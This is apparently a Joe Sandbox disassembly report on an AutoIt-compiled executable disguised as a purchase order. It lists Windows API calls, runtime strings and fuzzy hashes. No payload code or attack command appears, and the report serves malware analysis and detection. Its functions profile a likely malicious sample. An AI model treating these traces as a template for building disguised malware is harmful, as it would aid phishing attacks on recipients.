                                  • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                  • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                  • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                  • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                  • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                  • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                  • 742859E0.USER32(00000000,000000EB,?), ref: 00471E6E
                                  • GetClientRect.USER32(?,?), ref: 00471E8A
                                  • GetStockObject.GDI32(00000011), ref: 00471EA6
                                  • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                  • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                  Similarity
                                  • API ID: System$Metrics$Rect$Window$ClientInfoParameters$742859AdjustCreateMessageObjectSendStockTimer_malloc
                                  • String ID: @$AutoIt v3 GUI
                                  • API String ID: 463169423-3359773793
                                  • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                  • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                  • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                  • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                  Similarity
                                  • API ID: _wcscat$A1560__wcsicoll_wcscpy_wcslen_wcsncpy
                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                  • API String ID: 2681254697-1459072770
                                  • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                  • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                  Similarity
                                  • API ID: __wcsicoll$__wcsnicmp
                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                  • API String ID: 790654849-32604322
                                  • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                  • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                  • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                  • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                  • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                  APIs
                                    • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                  • _fseek.LIBCMT ref: 00452B3B
                                  • __wsplitpath.LIBCMT ref: 00452B9B
                                  • _wcscpy.LIBCMT ref: 00452BB0
                                  • _wcscat.LIBCMT ref: 00452BC5
                                  • __wsplitpath.LIBCMT ref: 00452BEF
                                  • _wcscat.LIBCMT ref: 00452C07
                                  • _wcscat.LIBCMT ref: 00452C1C
                                  • __fread_nolock.LIBCMT ref: 00452C53
                                  • __fread_nolock.LIBCMT ref: 00452C64
                                  • __fread_nolock.LIBCMT ref: 00452C83
                                  • __fread_nolock.LIBCMT ref: 00452C94
                                  • __fread_nolock.LIBCMT ref: 00452CB5
                                  • __fread_nolock.LIBCMT ref: 00452CC6
                                  • __fread_nolock.LIBCMT ref: 00452CD7
                                  • __fread_nolock.LIBCMT ref: 00452CE8
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452D78
                                  Similarity
                                  • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                  • String ID:
                                  • API String ID: 2054058615-0
                                  • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                  • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                  • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                  • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                  Similarity
                                  • API ID: Window
                                  • String ID: 0
                                  • API String ID: 2353593579-4108050209
                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                  APIs
                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                  • GetClientRect.USER32(?,?), ref: 0044A0D1
                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                  • 74286110.USER32(?), ref: 0044A0F6
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                  • 7427A480.USER32(?,?), ref: 0044A11B
                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                  • 742845F0.USER32(?,000000F0), ref: 0044A140
                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                  • 74286110.USER32(?), ref: 0044A1BE
                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                  • 7427A480.USER32(?,00000000), ref: 0044A229
                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                  Similarity
                                  • API ID: Color$Pixel$742774286110A480$742845ClientMessageModeObjectRectSendStockText
                                  • String ID:
                                  • API String ID: 1532117962-0
                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                  APIs
                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                  • __mtterm.LIBCMT ref: 00417C34
                                    • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                    • Part of subcall function 004178FF: RtlDeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                    • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                    • Part of subcall function 004178FF: RtlDeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                  • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                  • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                  • __init_pointers.LIBCMT ref: 00417CE6
                                  • __calloc_crt.LIBCMT ref: 00417D54
                                  • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                  Similarity
                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                  • API String ID: 4163708885-3819984048
                                  • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                  • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                  • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                  • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: >>>AUTOIT SCRIPT<<<$\
                                  • API String ID: 0-1896584978
                                  • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                  • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                  • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                  • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$IconLoad
                                  • String ID: blank$info$question$stop$warning
                                  • API String ID: 2485277191-404129466
                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                  APIs
                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                  • GetDesktopWindow.USER32 ref: 0045476F
                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                  • String ID:
                                  • API String ID: 3869813825-0
                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                  APIs
                                  • _wcslen.LIBCMT ref: 00464B28
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                  • _wcslen.LIBCMT ref: 00464C28
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                  • _wcslen.LIBCMT ref: 00464CBA
                                  • _wcslen.LIBCMT ref: 00464CD0
                                  • _wcslen.LIBCMT ref: 00464CEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$Directory$CurrentSystem
                                  • String ID: D
                                  • API String ID: 1914653954-2746444292
                                  • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                  • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                  • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                  • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll
                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                  • API String ID: 3832890014-4202584635
                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                  APIs
                                  • 74285CF0.USER32(?), ref: 004558E3
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285CreateWindow
                                  • String ID: ,$tooltips_class32
                                  • API String ID: 1109741162-3856767331
                                  • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                  • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                  • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                  • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                  • GetMenuItemCount.USER32(?), ref: 00468C45
                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                  • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                  • GetCursorPos.USER32(?), ref: 00468D3F
                                  • SetForegroundWindow.USER32(?), ref: 00468D49
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                  • String ID: 0
                                  • API String ID: 1441871840-4108050209
                                  • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                  • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                  • API String ID: 3631882475-2268648507
                                  • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                  • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                  APIs
                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                  • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                  • SendMessageW.USER32 ref: 00471740
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                  • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                  • 6FDA2980.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                  • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                  • 6FD9C400.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                  • 6FD9C400.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                  • SendMessageW.USER32 ref: 0047184F
                                  • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                  • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                  • DestroyCursor.USER32(?), ref: 0047189C
                                  • DestroyCursor.USER32(?), ref: 004718A2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$A2980C400CursorDestroyExtractIcon
                                  • String ID:
